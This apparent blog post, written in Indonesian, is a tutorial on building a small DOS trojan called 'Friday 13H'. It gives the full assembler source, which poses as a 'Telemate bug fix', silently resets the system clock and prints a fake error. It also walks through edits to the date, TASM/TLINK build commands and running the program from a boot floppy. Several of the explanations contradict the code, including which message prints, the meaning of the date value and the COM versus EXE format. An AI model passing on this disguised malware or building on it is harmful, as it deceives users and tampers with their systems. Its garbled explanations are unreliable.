Assembler Virus

Bagaimana cara membuat virus menggunakan bahasa Assembler?
Bagaimana cara kerjanya?

Disini akan diberikan contoh sebuah virus yang tidak terlalu sulit untuk anda dengan memanfaatkan program Turbo Assembler.
Hasil akhir Virus ini adalah akan mengganti tanggal komputer menjadi seperti yang progammer mau--dimana di virus Friday 13H ini menjadi 13 Juli 1990.
Lalu apa hubungannya ama Friday?
Cek deh tanggal komputer kamu kalau waktu itu adalah hari Jumat (Friday).
Lalu kenapa harus tanggal 13 Juli 1990?
Menurut sumber bahwa pada waktu itu ada kejadian seperti ketegangan di Israel.


Ok deh untuk history virus sampai sini aja, kita langsung ke pemograman virusnya.
Sebelum memulai pertama-tama kita harus menyediakan dahulu :

  1. Program Turbo Assembler
  2. Disket kosong yang bisa booting DOS, disket besar juga boleh tapi zaman gini lho masih ada yang makek disket besar, hehe..
--- 01 // Source Code ---

Berikut adalah source code virus Friday 13H

<++ Friday13H ++>

CODE SEGMENT
Assume CS:code,DS:code
ORG 100h

start: Jmp begin
text1 db ' Telemate bug fix for version 3.0+$ ' ;Bogus filler text
text2 db ' TM.EXE fixed!$ ' ;Bogus filler text
text3 db 07h,'Error! Cannot alter TM.EXE$ ' ;Printed after change

Begin proc NEAR
mov ah,05h ;Function 5 - Set Real Time Clock
mov cx,1990h ;What century
mov dx,0713h ;Month/day
int 1ah ;Execute

mov ah,09h ;Funtion 9 - Print string
lea dx,text3 ;What text to print
int 21h ;Execute function 09
int 20h ;Quit .COM file
begin endp

CODE ENDS ;End segment
END start ;End program
<-- Friday13H -->

--- 02 // Penjelasan Source Code ---

Itu adalah source code aslinya tapi anda jangan terkecoh karena diprogram ini ada variabel yang sebenarnya tidak perlu.
Ok, kita mulai langsung dari source utamanya, untuk mendalami lebih jauh tentang assembler silahkan membaca tentang tutorial assembler di http://ilmukomputer.com/

1. text1 db ' Telemate bug fix for version 3.0+$ '
 // Perintah ini akan ditampilkan jika program berhasil bekerja.

2. text2 db ' TM.EXE fixed!$ ' ;Bogus filler text
 // Perintah ini sebenarnya ga perlu ada karena variabelnya gak digunain

3. text3
 text3 db 07h,'Error! Cannot alter TM.EXE$ ' ;Printed after change

// Perintah ini akan ditampilkan jika kamu compile dengan com file
// Jika tampil peritah seperti diatas maka itu artinya error alias
// tanggal tidak berubah
// Solusinya jika tampil pesan diatas maka compile ulang dengan
// exe, dan bukan com

4. Begin proc NEAR
 // Memulai program

mov ah,05h ;Function 5 - Set Real Time Clock
// memindahkan 05h ke AH

5. mov cx,1990h ;What century
 // ubah tahun 1990 itu jadi 2004 aja jadi hasil editingnya
// seperti dibawah ini

mov cx,2004h

6. mov dx,0713h ;Month/day
 // ubah bulan 07 dan tanggal 13 menjadi 06 dengan tanggal 13
// jadi hasil editingnya :

mov dx,0605h

7. int 1ah ;Execute
 // Dieksekusi peritah diatas dan berubahlah tanggal komputer jika
// dijalankan

8. mov ah,09h ;Funtion 9 - Print string

lea dx,text3 ;What text to print
int 21h ;Execute function 09
int 20h ;Quit .COM file
begin endp

// Perintah-perintah tersebut akan melakukan eksekusi pada text 3

text3 db 07h,'Error! Cannot alter TM.EXE$ ' ;Printed after change

9. CODE ENDS ;End segment

END start ;End program

//Program Selesai

--- 03 // Kompilasi ---

Ok sekarang kita masuk dalam program Turbo Assembler, perlu diketahui dimana di Turbo Assembler kita harus melakukan compile 2 kali agar hasil ahkirnya menjadi EXE.

Info File Exe pada program Turbo Assembler untuk mengcompile :

  • - TASM.EXE (Untuk mengcompile file tahap 1 untuk menjadikan file ASM menjadi OBJ)
  • - TLINK.EXE (Untuk mengcompile file tahap 1 untuk menjadikan file OBJ menjadi EXE)

Selanjutnya, bukan text-editor untuk membuat virus.asm. Lalu mengcompile dengan perintah `tasm virus.asm'.

C:\TA2>tasm virus.asm
Turbo Assembler Version 2.0 Copyright (c) 1987, 1990 Borland International

Assembling file: virus.aSM
Error messages: None
Warning messages: None
Passes: 1
Remaining memory: 443k

Setelah itu kita compile tahap kedua agar file virus.obj menjadi virus.exe dengan cara perintah `tlink virus'

C:\TA2>tlink virus
Turbo Link Version 3.0 Copyright (c) 1987, 1990 Borland International
Warning: No stack

--- 04 // Eksekusi ---

Proses eksekusi membutuhkan DOS original (bukan DOS pada Windows XP). Jika dijalankan pada WinXP, maka akan terjadi error seperti:

|--------------------------
| 16 bit MS-DOS Subsystem
|--------------------------
| Command Prompt - virus
| The Close gas ebcountered an illegal instruksi
| CS:00 bla.. bla..

dan jam komputer pun tidak akan berubah. Metode efektif untuk mencobanya adalah dengan menyalin file virus.exe ke dalam sebuah floppydisk, restart komputer, lalu booting dengan DOS
menggunakan disket. Lalu jalankan dengan perintah `virus'.

Setelah menjalankan program `virus' maka Anda dapat melihat notifikasi

Telemate bug fix for version 3.0+

Langkah selanjutnya adalah dengan merestart komputer dan cek perubahan tanggal yang terjadi.

Tanggal komputer Anda akan berubah menjadi tanggal 05 Juni 2004. Itu tanggal apa ya?
Itu adalah tanggal kelahiran website Yogya Family Code.

--- 05 // Penutup ---

Tujuan dari tutorial ini adalah kita paling tidak memahami dasar assembler dimana ahkirnya kita dapat mencoba source virus-virus yang ada di Internet atau CD yang akhirnya diharapkan ke depannya kita dapat membuat sebuah antivirus buatan sendiri.
Diposkan oleh di
Label: ,

No comments:

Post a Comment

Post Comments


Do you have any suggestions ? Add comment. Do not spam!

Subscribe to: Post Comments (Atom)